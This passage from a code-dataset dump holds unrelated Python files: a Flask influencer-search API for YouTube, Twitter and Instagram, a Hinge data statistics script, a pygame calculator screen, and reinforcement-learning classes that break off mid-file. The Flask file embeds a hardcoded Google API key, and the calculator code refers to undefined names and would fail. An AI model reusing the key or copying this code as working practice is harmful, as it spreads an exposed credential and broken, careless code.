'sort_order' : fields.String(required=False, description='Sort Order'),\n 'offset' : fields.Integer(required=True, 
description='Offset')\n})\n\n\n@ns_youtube.route('/regionCodes')\nclass RegionCodes(Resource):\n def get(self):\n '''get all youtube region codes'''\n connecsiObj = ConnecsiModel()\n region_codes = connecsiObj.get__(table_name='youtube_region_codes', STAR='*')\n columns = ['region_code', 'country_name']\n response_list = []\n for item in region_codes:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n return {'data' : response_list}\n\n@ns_youtube.route('/regionCode/')\nclass RegionCode(Resource):\n def get(self,regionCode):\n '''get country name by region code'''\n connecsiObj = ConnecsiModel()\n data = connecsiObj.get__(table_name='youtube_region_codes',STAR='*',WHERE='WHERE',compare_column='regionCode',compare_value=str(regionCode))\n return {'data' : data}\n\n@ns_youtube.route('/videoCategories')\nclass VideoCategories(Resource):\n def get(self):\n ''' get all video categories'''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get__(table_name='youtube_video_categories', STAR='*')\n print(video_categories)\n columns = ['video_cat_id','video_cat_name']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n@ns_youtube.route('/videoCategories/')\nclass VideoCategories(Resource):\n def get(self,video_cat_id):\n ''' get video categories by video cat id '''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get__(table_name='youtube_video_categories', STAR='*',WHERE='WHERE',compare_column='video_cat_id',compare_value=video_cat_id)\n print(video_categories)\n columns = ['video_cat_id','video_cat_name']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/searchChannels/')\nclass SearchChannels(Resource):\n @ns_youtube.expect(search_channels_form)\n def post(self,channel):\n '''search channels'''\n try:\n form_data = request.get_json()\n category_id = form_data.get('category_id')\n country = form_data.get('country')\n min_lower = form_data.get('min_lower')\n max_upper = form_data.get('max_upper')\n sort_order = form_data.get('sort_order')\n offset = form_data.get('offset')\n connecsiObj=ConnecsiModel()\n if channel == 'youtube' or channel == 'Youtube':\n print('i m inside if')\n total_rows = connecsiObj.search_youtube_inf_get_total_rows(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n\n # print('my data = ',total_rows)\n print(total_no_of_rows)\n data = connecsiObj.search_youtube_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n ,category_id=str(category_id), country=str(country), sort_order=sort_order,offset=str(offset))\n columns = ['channel_id', 'title','channel_img','desc','subscriberCount_gained','subscriberCount_lost','business_email','total_100video_views',\n 'total_100video_views_unique','total_100video_likes','total_100video_dislikes','total_100video_comments','total_100video_shares',\n 'facebook_url','insta_url','twitter_url','country']\n response_list = []\n\n # print(type(data))\n # print(data)\n for item in data:\n # print(item)\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows':total_no_of_rows})\n response_list.append(dict_temp)\n # print(response_list)\n return {'data':response_list}\n\n elif 
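Every handler above shapes database rows the same way: zip a column list with each tuple and collect dicts. A one-line helper capturing that pattern (the column names here are from the region-codes endpoint):

def rows_to_dicts(columns, rows):
    return [dict(zip(columns, row)) for row in rows]

cols = ["region_code", "country_name"]
print(rows_to_dicts(cols, [("US", "United States"), ("DE", "Germany")]))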
channel == 'twitter' or channel == 'Twitter':\n total_rows = connecsiObj.search_twitter_inf_get_total_rows(min_lower=str(min_lower),\n max_upper=str(max_upper)\n , category_id=str(category_id),\n country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n data = connecsiObj.search_twitter_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country),\n sort_order=sort_order, offset=str(offset))\n columns = ['channel_id','screen_name','title', 'channel_img', 'desc', 'subscriberCount_gained',\n 'business_email', 'total_100video_views',\n 'total_100video_likes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url','youtube_url', 'twitter_url', 'country']\n response_list = []\n for item in data:\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows': total_no_of_rows})\n response_list.append(dict_temp)\n # print(response_list)\n return {'data': response_list}\n\n elif channel == 'instagram' or channel == 'Instagram':\n total_rows = connecsiObj.search_instagram_inf_get_total_rows(min_lower=str(min_lower),\n max_upper=str(max_upper)\n , category_id=str(category_id),\n country=str(country), sort_order=sort_order)\n total_no_of_rows = len(total_rows)\n print('total rows insta = ',total_no_of_rows)\n data = connecsiObj.search_instagram_inf(min_lower=str(min_lower), max_upper=str(max_upper)\n , category_id=str(category_id), country=str(country),\n sort_order=sort_order, offset=str(offset))\n print(data)\n columns = ['channel_id','username','title', 'channel_img', 'desc', 'subscriberCount_gained',\n 'business_email', 'total_100video_views',\n 'total_100video_likes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url','youtube_url', 'twitter_url', 'country','total_videos']\n response_list = []\n for item in data:\n dict_temp = dict(zip(columns, item))\n dict_temp.update({'total_rows': total_no_of_rows})\n response_list.append(dict_temp)\n print(response_list)\n return {'data': response_list}\n except Exception as e:\n print('i m in exception ')\n print(e)\n return {'response' : e}\n\n\n@ns_youtube.route('/top10Influencers')\nclass Youtube(Resource):\n def get(self):\n '''get top 10 youtube influencers based on number of subscribers desc'''\n connecsiObj = ConnecsiModel()\n youtube_inf = connecsiObj.getTop10YoutubeInfluencers()\n columns = ['channel_id', 'title', 'channel_img','subscriberCount_gained','total_100video_views','total_100video_likes',\n 'total_100video_comments','total_100video_shares','facebook_url', 'insta_url', 'twitter_url','country','total_videos']\n response_list = []\n for item in youtube_inf:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n return {'data' : response_list}\n\n\n@ns_youtube.route('/totalVideos/')\nclass TotalVideos(Resource):\n def get(self,channel_id):\n '''get total videos by channel_id'''\n connecsiObj = ConnecsiModel()\n data = connecsiObj.getTotalVideos(channel_id=channel_id)\n response_list = []\n columns=['total_videos']\n for item in data:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n return {'data': response_list}\n\n\n@ns_youtube.route('/addYoutubeChannel//')\nclass Youtube(Resource):\n def post(self,channel_id,business_email):\n '''add youtube channel details by channel_id'''\n try:\n data = [channel_id]\n connecsiObj = ConnecsiModel()\n res = connecsiObj.insert__(data=data, table_name='youtube_channel_ids', columns=['channel_id'],\n IGNORE='IGNORE')\n 
print('res = ',res)\n try:\n connecsiObj.insert_youtube_id_into_channels_mapper(youtube_channel_id=channel_id,confirmed='true')\n except Exception as e:\n print(e)\n return {'message' : e}\n try:\n conObj = YoutubeApiController()\n conObj.get_data_by_channel_id(channel_id=channel_id,business_email=business_email)\n return {'message': 'inserted youtube channel id and details'}\n except Exception as e :\n print('exception = ',e)\n return {'message': e}\n except Exception as e :\n return {'message' : e}\n\n\n\n@ns_youtube.route('/getYoutubeChannelSnippetFromYoutubeSearchApi/')\nclass Youtube(Resource):\n def get(self,search_query):\n ''' Get youtube channel snippet from youtube Search api\n returns a list of channel ids , title and channel img\n '''\n try:\n print(search_query)\n response_list = []\n channel_ids=[]\n api_key = 'AIzaSyDAwoNaRbQYSl7J_Ll2fztqwT1Gg1ZEMzU'\n search_url = 'https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=50&order=viewCount&q='+search_query+'&type=channel&key='+api_key\n print(search_url)\n channel_data = requests.get(url=search_url)\n channel_data_json = channel_data.json()\n for item in channel_data_json['items']:\n print(item)\n response_dict = {}\n channel_id = item['snippet']['channelId']\n print(channel_id)\n channel_ids.append(channel_id)\n channel_thumbnail = item['snippet']['thumbnails']['medium']['url']\n channelTitle = item['snippet']['title']\n response_dict.update({'channel_id':channel_id})\n response_dict.update({'title': channelTitle})\n response_dict.update({'channel_img': channel_thumbnail})\n response_list.append(response_dict)\n connecsiObj = ConnecsiModel()\n connecsiObj.insert__(table_name='youtube_channel_ids',data=channel_ids,columns=['channel_id'],IGNORE='IGNORE')\n return response_list\n except Exception as e:\n print('exception = ',e)\n return {'message': e}\n\n@ns_youtube.route('/getYoutubeChannelDetailsFromYoutubeApi/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' Get youtube channel details by channel_id from youtube api'''\n try:\n data = [channel_id]\n connecsiObj = ConnecsiModel()\n res = connecsiObj.insert__(data=data, table_name='youtube_channel_ids', columns=['channel_id'],\n IGNORE='IGNORE')\n print('res = ',res)\n try:\n connecsiObj.insert_youtube_id_into_channels_mapper(youtube_channel_id=channel_id,confirmed='true')\n except Exception as e:\n print(e)\n return {'message' : e}\n try:\n conObj = YoutubeApiController()\n conObj.get_data_by_channel_id(channel_id=channel_id,business_email='')\n connecsiObj = ConnecsiModel()\n columns = ['channel_id', 'title', 'channel_img', 'desc', 'subscriberCount_gained', 'subscriberCount_lost',\n 'business_email', 'total_100video_views',\n 'total_100video_views_unique', 'total_100video_likes', 'total_100video_dislikes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url', 'twitter_url', 'country']\n channel_details = connecsiObj.get__(table_name='youtube_channel_details', columns=columns, WHERE='WHERE',\n compare_column='channel_id', compare_value=channel_id)\n print(channel_details)\n\n response_list = []\n for item in channel_details:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n print(response_list)\n return {'data': response_list}\n except Exception as e :\n print('exception = ',e)\n return {'message': e}\n except Exception as e :\n return {'message' : e}\n\n\n\n@ns_youtube.route('/getChannelDetailsByChannelId/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' get channel detail by 
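The channel-search endpoint above interpolates the query and an API key straight into the URL. A sketch of the same call letting requests handle the encoding and reading the key from the environment; the endpoint and parameters are those of the YouTube Data API v3 search call in the record, while the env var name is ours:

import os
import requests

def search_channels(query):
    resp = requests.get(
        "https://www.googleapis.com/youtube/v3/search",
        params={"part": "snippet", "maxResults": 50, "order": "viewCount",
                "q": query, "type": "channel",
                "key": os.environ["YOUTUBE_API_KEY"]},
        timeout=30)
    resp.raise_for_status()
    return resp.json()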
channel id'''\n connecsiObj = ConnecsiModel()\n columns = ['channel_id', 'title', 'channel_img', 'desc', 'subscriberCount_gained', 'subscriberCount_lost',\n 'business_email', 'total_100video_views',\n 'total_100video_views_unique', 'total_100video_likes', 'total_100video_dislikes',\n 'total_100video_comments', 'total_100video_shares',\n 'facebook_url', 'insta_url', 'twitter_url', 'country']\n channel_details = connecsiObj.get__(table_name='youtube_channel_details',columns=columns,WHERE='WHERE',compare_column='channel_id',compare_value=channel_id)\n print(channel_details)\n\n response_list = []\n for item in channel_details:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/getAllVideoDetailsByChannelId/')\nclass Youtube(Resource):\n def get(self,channel_id):\n ''' get video detail by channel id'''\n connecsiObj = ConnecsiModel()\n columns = ['video_id','channel_id','publishedAt','title','thumbnail','tags','category_id',\n 'description','viewCount','likeCount','dislikeCount','favoriteCount','commentCount','shareCount']\n video_details = connecsiObj.get__(table_name='youtube_video_details',columns=columns,WHERE='WHERE',compare_column='channel_id',compare_value=channel_id)\n print(type(video_details))\n video_details_list = list(video_details)\n print(type(video_details_list))\n response_list = []\n for item in video_details_list:\n item_list = list(item)\n item_list[2] = datetime.datetime.timestamp(item_list[2])\n dict_temp = dict(zip(columns, item_list))\n response_list.append(dict_temp)\n # print(response_list)\n return {'data': response_list}\n\n\n@ns_youtube.route('/getVideoCategoriesByChannelId/')\nclass VideoCategories(Resource):\n def get(self,channel_id):\n ''' get video categories by video cat id '''\n connecsiObj = ConnecsiModel()\n video_categories = connecsiObj.get_youtube_video_categories_id_and_name_by_channel_id(channel_id=channel_id)\n print(video_categories)\n columns = ['channel_id','video_cat_id','video_cat_name','category_count']\n response_list = []\n for item in video_categories:\n dict_temp = dict(zip(columns, item))\n response_list.append(dict_temp)\n\n print(response_list)\n return {'data': response_list}","repo_name":"kiran-padwal/backend_connecsi","sub_path":"apis/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":17539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36041328444","text":"import json\nimport sys\nimport re\n\ninput_file = sys.argv[1]\n\nprint(\"Parsing data...\")\n\nrejected = 0\nlikes = 0\nmatches = 0\nchats = 0\nu_ghosted = 0\nunrequited_love = 0\nthey_dunk = 0\nthey_ghosted = 0\nu_dunk = 0\ntotal_interactions = 0\nnumbers_sent = 0\n\n# Thanks to StackOverflow for this regex for phone numbers\n# https://stackoverflow.com/a/16702965/1031615\nphone_regex = '^.*\\s*(?:\\+?(\\d{1,3}))?[-. (]*(\\d{3})[-. )]*(\\d{3})[-. 
]*(\\d{4})(?: *x(\\d+))?\\s*'\n\nwith open(input_file, 'r') as f:\n data = json.load(f)\n for blob in data:\n interactions = list(blob.keys())\n first_interaction = interactions[0]\n if len(interactions) > 1:\n second_interaction = interactions[1]\n else:\n second_interaction = 'noop'\n total_interactions += 1\n if first_interaction == 'block':\n rejected += 1\n elif first_interaction == 'like':\n likes += 1\n if second_interaction == 'match':\n matches += 1\n u_ghosted += 1\n u_dunk +=1\n elif first_interaction == 'match':\n matches += 1\n they_dunk += 1\n they_ghosted += 1\n elif first_interaction == 'chats':\n chats += 1\n if second_interaction == 'like':\n likes += 1\n matches += 1\n u_dunk +=1\n elif second_interaction == 'match':\n matches += 1\n they_dunk += 1\n for c in blob['chats']:\n if bool(re.search(phone_regex, c['body'])):\n numbers_sent += 1\n break\n\ntot_string = \"You've interacted with \" + str(total_interactions) + \" people on Hinge \\n\"\nrej_string = \"You've rejected \" + str(rejected) + \" people (ouch) \\nYou match with \" + str(round(matches/total_interactions * 100, 2)) + \"% of profiles you see on Hinge.\\n\"\ntot_ghost_string = \"You've ghosted at least \" + str(u_ghosted + they_ghosted) + \", or at least \" + str(round((u_ghosted+they_ghosted)/matches * 100, 2)) + \"% of all the people you match with\\n\"\nu_ghost_string = \"Total you've dropped the ball: \" + str(u_ghosted) + \" (you sent a like and they matched, no chatting) \\n\"\nthey_ghost_string = \"Total they've dropped the ball \" + str(they_ghosted) + \" (they sent a like and you matched, no chatting) \\n\"\nthey_dunk_string = \"Total shots they've shot and scored: \" + str(they_dunk) + \" (they sent a like and you matched) \\n\"\nu_dunk_string = \"Total shots you've shot and scored: \" + str(u_dunk) + \" (you sent a like and they matched) \\n\"\ntot_likes = \"Total shots you've shot: \" + str(likes) + \" (you sent a like)\\n\"\ntot_matches = \"Total slam dunks: \" + str(matches) + \" (you've matched with someone or they've matched with you) \\n\"\ntot_chats = \"Total people you've blessed with your time: \" + str(chats) + \" (you sent a message at least once) \\n\"\ntot_numbers = \"You've sent a phone number to \" + str(numbers_sent) + \" people on Hinge, or \" + str(round((numbers_sent/matches) * 100, 2)) + \"% of all the people you match with.\\n\"\n\nanalysis = tot_string + tot_likes + tot_matches + tot_chats\nanalysis += \"\\n------------- \\n\\n\\n\"\nanalysis += \"Fun Stuff ~ \\n\\n\"\nanalysis += rej_string + tot_ghost_string + u_ghost_string + they_ghost_string + they_dunk_string + u_dunk_string + tot_numbers\n\n\nprint(\"Analysis complete!\")\nprint(analysis)\n","repo_name":"emam97/tiktok","sub_path":"lib/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"33253549481","text":"import pygame\nimport pygame_textinput\n\nfrom utils.load_assets import (\n BG_CALC_L,\n BG_CALC_D,\n BIG_FONT,\n MAIN_FONT,\n BACK,\n MENU,\n FONT_COLOR_L,\n FONT_COLOR_D,\n)\nfrom settings import WIN, WIDTH, WIDTH_H, HEIGHT_H, FPS\nfrom utils.user_settings_handling import return_user_settings\nfrom apps.settings_menu import settings_menu\n\n\ndef kalkulacka_app():\n \"\"\"\n GUI pre Kalkulacku\n \"\"\"\n run = True\n click = False\n clock = pygame.time.Clock()\n active = None\n\n # BUTTON INITIALIZATION\n B_RETURNED_PRICE = pygame.Rect(140, 480, 220, 95)\n B_BACK = 
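The ghosting statistics above hinge on `re.search` with the StackOverflow phone pattern. A quick standalone check of the pattern against a few invented chat lines shows what it does and does not flag; the sample strings are made up for illustration:

```python
import re

# Same pattern as above, written as a raw string.
phone_regex = r'^.*\s*(?:\+?(\d{1,3}))?[-. (]*(\d{3})[-. )]*(\d{3})[-. ]*(\d{4})(?: *x(\d+))?\s*'

for body in ["text me at 555-867-5309",
             "call (212) 555 0199 tomorrow",
             "no digits here"]:
    print(repr(body), "->", bool(re.search(phone_regex, body)))
# True, True, False
```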
pygame.Rect(20, 20, 60, 60)\n B_MENU = pygame.Rect(WIDTH - 65 - 20, 20, 60, 60)\n\n while run:\n pos_x, pos_y = pygame.mouse.get_pos()\n user_settings = return_user_settings()\n BG = BG_CALC_L if user_settings[\"theme\"] == \"light\" else BG_CALC_D\n FONT_COLOR = FONT_COLOR_L if user_settings[\"theme\"] == \"light\" else FONT_COLOR_D\n WIN.blit(BG, (0, 0))\n WIN.blit(BACK, (20, 20))\n WIN.blit(MENU, (WIDTH - 65 - 20, 20))\n\n # LABELS\n label_ac = BIG_FONT.render(\"AC\", 1, FONT_COLOR)\n WIN.blit(label_ac, (65, 365))\n label_7 = BIG_FONT.render(\"7\", 1, FONT_COLOR)\n WIN.blit(label_7, (80, 465))\n label_4 = BIG_FONT.render(\"4\", 1, FONT_COLOR)\n WIN.blit(label_4, (80, 565))\n label_4 = BIG_FONT.render(\"1\", 1, FONT_COLOR)\n WIN.blit(label_4, (88, 665))\n label_0 = BIG_FONT.render(\"0\", 1, FONT_COLOR)\n WIN.blit(label_0, (130, 765))\n label_8 = BIG_FONT.render(\"8\", 1, FONT_COLOR)\n WIN.blit(label_8, (185, 465))\n label_5 = BIG_FONT.render(\"5\", 1, FONT_COLOR)\n WIN.blit(label_5, (185, 565))\n label_2 = BIG_FONT.render(\"2\", 1, FONT_COLOR)\n WIN.blit(label_2, (185, 665))\n label_9 = BIG_FONT.render(\"9\", 1, FONT_COLOR)\n WIN.blit(label_9, (280, 465))\n label_6 = BIG_FONT.render(\"6\", 1, FONT_COLOR)\n WIN.blit(label_6, (280, 565))\n label_3 = BIG_FONT.render(\"3\", 1, FONT_COLOR)\n WIN.blit(label_3, (280, 665))\n label_equals = BIG_FONT.render(\"=\", 1, FONT_COLOR)\n WIN.blit(label_equals, (395, 765))\n label_dot = BIG_FONT.render(\".\", 1, FONT_COLOR)\n WIN.blit(label_dot, (290, 765))\n label_divide = BIG_FONT.render(\"/\", 1, FONT_COLOR)\n WIN.blit(label_divide, (400, 365))\n label_times = BIG_FONT.render(\"*\", 1, FONT_COLOR)\n WIN.blit(label_times, (400, 475))\n label_minus = BIG_FONT.render(\"-\", 1, FONT_COLOR)\n WIN.blit(label_minus, (400, 570))\n label_plus = BIG_FONT.render(\"+\", 1, FONT_COLOR)\n WIN.blit(label_plus, (398, 668))\n\n # Zistovanie, ci nebolo kliknute na textove pole\n if click:\n if B_STOCK_INPUT.collidepoint(pos_x, pos_y):\n active = stock_input\n elif B_GET_PRICE.collidepoint(pos_x, pos_y):\n result = price_validation(stock_input.get_text().strip())\n elif B_BACK.collidepoint(pos_x, pos_y):\n run = False\n elif B_MENU.collidepoint(pos_x, pos_y):\n settings_menu()\n events = pygame.event.get()\n stock_input.update(events)\n else:\n active = None\n\n # Setnutie aktivneho textoveho pola, pokial nejake je\n try:\n active.update(events)\n except AttributeError:\n pass\n\n # keys = pygame.key.get_pressed()\n # if keys[pygame.K_RETURN]:\n # result = price_validation(stock_input.get_text().strip())\n\n # Event handling\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n click = False\n\n pygame.display.update()\n clock.tick(FPS)\n","repo_name":"MichalRybecky/JAKP","sub_path":"apps/kalkulacka.py","file_name":"kalkulacka.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"39310197616","text":"import math\nimport numpy as np\n\n\nclass default_analysis(object):\n\t\"\"\"A placeholder class for analysis conducted during training.\n\n\tTo be overwritten by specialized code for the problem being\n\tstudied.\n\t\"\"\"\n\t\n\tdef per_step(self, past_state, action, current_state, action_probability):\n\t\t\"\"\"Placeholder for the calculations conducted at each episode 
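The calculator above hit-tests buttons with `Rect.collidepoint` against the polled mouse position. A self-contained sketch of the same idea driven by `MOUSEBUTTONDOWN` events rather than a separate `click` flag; the window size and button placement are arbitrary:

```python
import pygame

pygame.init()
screen = pygame.display.set_mode((480, 320))
button = pygame.Rect(20, 20, 60, 60)  # same shape as B_BACK above

running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
            if button.collidepoint(event.pos):  # the hit test the buttons rely on
                print("button pressed")
    pygame.display.update()
pygame.quit()
```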
step.\"\"\"\n\t\tpass\n\n\tdef reset(self):\n\t\t\"\"\"Placeholder for resetting state after each episode.\"\"\"\n\t\tpass\n\n\tdef per_episode(self, state):\n\t\t\"\"\"Placeholder for calculations conducted after each episode.\"\"\"\n\t\tpass\n\n\tdef evaluation_reset(self):\n\t\t\"\"\"Alternative reset for post-training evaluation.\"\"\"\n\t\tpass\n\n\tdef per_sample(self, state, sample):\n\t\t\"\"\"Alternative for per episode calculations during evaluation.\"\"\"\n\t\tpass\n\nclass episodic_algorithm(object):\n\t\"\"\"A wrapper for episodic RL algorithms.\n\t\n\tLays out the general structure of finite-time RL algorithms, with\n\tplaceholder functions to be overwritten as required by inheriting \n\tclasses.\n\t\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tself.environment = parameters['environment']\n\t\tself.average_return = 0\n\t\tself.average_returns = []\n\t\tself.returns = []\n\t\tself.return_learning_rate = parameters['return_learning_rate']\n\t\tself.policy = parameters['policy']\n\t\tself.episode = 0\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.action = 0\n\t\tself.action_probability = 0.5\n\t\tself.reward = 0\n\t\tself.current_return = 0\n\t\tself.end = False\n\t\tself.info = None\n\t\tif 'analyser' in parameters:\n\t\t\tself.analyser = parameters['analyser']\n\t\telse:\n\t\t\tself.analyser = default_analysis()\n\t\n\tdef _reward(self):\n\t\t\"\"\"Placeholder function which can be overwritten to modify the reward.\"\"\"\n\t\treturn self.reward\n\n\tdef _transition(self):\n\t\t\"\"\"Requests an action from the policy and sends it to the environment.\"\"\"\n\t\tself.past_state = self.current_state.copy()\n\t\tself.action, self.eligibility, self.action_probability = self.policy.action(\n\t\t\tself.current_state)\n\t\tself.current_state, self.reward, self.end, self.info = self.environment.step(\n\t\t\tself.action)\n\t\tself.current_return += self._reward()\n\t\tself.analyser.per_step(self.past_state, self.action, \n\t\t\t\t\t\t\t\tself.current_state, self.action_probability)\n\n\tdef _per_step(self):\n\t\t\"\"\"A placeholder for a learning algorithms computations per transition.\"\"\"\n\t\tself._transition()\n\n\tdef _per_episode(self):\n\t\t\"\"\"A placeholder for a learning algorithms computations after episodes.\"\"\"\n\t\tself.analyser.per_episode(self.current_state)\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.end = False\n\n\tdef _episode(self):\n\t\t\"\"\"Uses _per_step and _per_episode to run a generic episodes computations.\"\"\"\n\t\tself.current_return = 0\n\t\twhile not self.end:\n\t\t\tself._per_step()\n\t\tself._per_episode()\n\t\tself.average_return += self.return_learning_rate * (self.current_return \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t- self.average_return)\n\t\tself.episode += 1\n\n\tdef train(self, episodes):\n\t\t\"\"\"Trains the policy by repeatedly running episodes, storing return info.\"\"\"\n\t\tself.episode = 0\n\t\twhile self.episode < episodes:\n\t\t\tself._episode()\n\t\t\tself.average_returns.append(self.average_return)\n\t\t\tself.returns.append(self.current_return)\n\n\tdef _sample(self):\n\t\t\"\"\"Generates a sample trajectory using the current policy.\"\"\"\n\t\tself.current_return = 0\n\t\ttrajectory = [self.current_state.copy()]\n\t\twhile not self.end:\n\t\t\tself._transition()\n\t\t\ttrajectory.append(self.current_state.copy())\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = 
self.current_state.copy()\n\t\tself.end = False\n\t\tself.analyser.reset()\n\t\treturn trajectory\n\n\tdef samples(self, sample_count):\n\t\t\"\"\"Generates a set of trajectory samples.\"\"\"\n\t\ttrajectories = []\n\t\tsample = 0\n\t\twhile sample < sample_count:\n\t\t\ttrajectory = self._sample()\n\t\t\ttrajectories.append(trajectory)\n\t\t\tsample += 1\n\t\treturn trajectories\n\n\tdef _return_sample(self):\n\t\t\"\"\"Runs an episode to sample a return for evaluation.\"\"\"\n\t\tself.current_return = 0\n\t\twhile not self.end:\n\t\t\tself._transition()\n\t\tself.analyser.per_sample(self.current_state, self.sample)\n\t\tself.current_state = self.environment.reset()\n\t\tself.past_state = self.current_state.copy()\n\t\tself.end = False\n\n\tdef evaluate(self, sample_count):\n\t\t\"\"\"Evaluates the policy by estimating the average return.\"\"\"\n\t\tself.sample = 1\n\t\tself.average_return = 0\n\t\tself.analyser.evaluation_reset()\n\t\twhile self.sample <= sample_count:\n\t\t\tself._return_sample()\n\t\t\tself.average_return += (self.current_return - self.average_return)/self.sample\n\t\t\tself.sample += 1\n\n\nclass monte_carlo_returns(episodic_algorithm):\n\t\"\"\"A purely return based policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.states = []\n\t\tself.rewards = []\n\t\tself.eligibilities = []\n\n\tdef _per_step(self):\n\t\t\"\"\"Adds required data storage for learning post-episode.\"\"\"\n\t\tself._transition()\n\t\tself.states.append(self.past_state)\n\t\tself.rewards.append(self._reward())\n\t\tself.eligibilities.append(self.eligibility)\n\n\tdef _update(self):\n\t\t\"\"\"Loops over the episode in reverse, updating the policy in each state.\"\"\"\n\t\tself.rewards = np.array(self.rewards)\n\t\tstate_return = 0\n\t\tfor index in range(len(self.states) - 1, -1, -1):\n\t\t\tstate_return += self.rewards[index]\n\t\t\tself.policy.step(self.states[index], state_return, self.eligibilities[index])\n\n\tdef _per_episode(self):\n\t\t\"\"\"Adds additional resets relevant to learning algorithm.\"\"\"\n\t\tself._update()\n\t\tsuper()._per_episode()\n\t\tself.states = []\n\t\tself.rewards = []\n\t\tself.eligibilities = []\n\n\nclass max_entropy_monte_carlo_returns(monte_carlo_returns):\n\t\"\"\"Adds entropy to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_monte_carlo_returns(monte_carlo_returns):\n\t\"\"\"Adds Kullback-Leibler regularization to a purely return based policy gradient algorithm.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg\n\n\nclass monte_carlo_value_baseline(monte_carlo_returns):\n\t\"\"\"Contrasts returns with estimated values for policy updates.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.values = parameters['values']\n\t\tself.state_values = []\n\n\tdef _per_step(self):\n\t\t\"\"\"Adds required data storage for learning post-episode.\"\"\"\n\t\tsuper()._per_step()\n\t\tself.state_values.append(self.values.forward(self.past_state))\n\n\tdef 
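`monte_carlo_returns._update` walks the episode backwards so each state's policy update uses its return-to-go. The same backward pass in isolation; the `gamma` parameter is an optional generalisation shown for context, the class above is undiscounted:

```python
def returns_to_go(rewards, gamma=1.0):
    # Accumulate from the end of the episode, as in _update's reversed loop.
    out, running = [], 0.0
    for r in reversed(rewards):
        running = r + gamma * running
        out.append(running)
    return out[::-1]

print(returns_to_go([0, 0, 1]))                                  # [1.0, 1.0, 1.0]
print([round(g, 2) for g in returns_to_go([0, 0, 1], gamma=0.9)])  # [0.81, 0.9, 1.0]
```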
_update(self):\n\t\t\"\"\"Loops over the episode in reverse, updating state policies and values.\"\"\"\n\t\tself.rewards = np.array(self.rewards)\n\t\tstate_return = 0\n\t\tfor index in range(len(self.states) - 1, -1, -1):\n\t\t\tstate_return += self.rewards[index]\n\t\t\terror = state_return - self.state_values[index]\n\t\t\tself.policy.step(self.states[index], error, self.eligibilities[index])\n\t\t\tself.values.step(self.states[index], error)\n\n\tdef _per_episode(self):\n\t\t\"\"\"Adds additional resets relevant to learning algorithm.\"\"\"\n\t\tsuper()._per_episode()\n\t\tself.state_values = []\n\n\nclass max_entropy_monte_carlo_value_baseline(monte_carlo_value_baseline):\n\t\"\"\"Adds entropy regularization to a value-baseline policy gradient algorithm.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_monte_carlo_value_baseline(monte_carlo_value_baseline):\n\t\"\"\"Adds Kullback-Leibler regularization to a value-baseline policy gradient 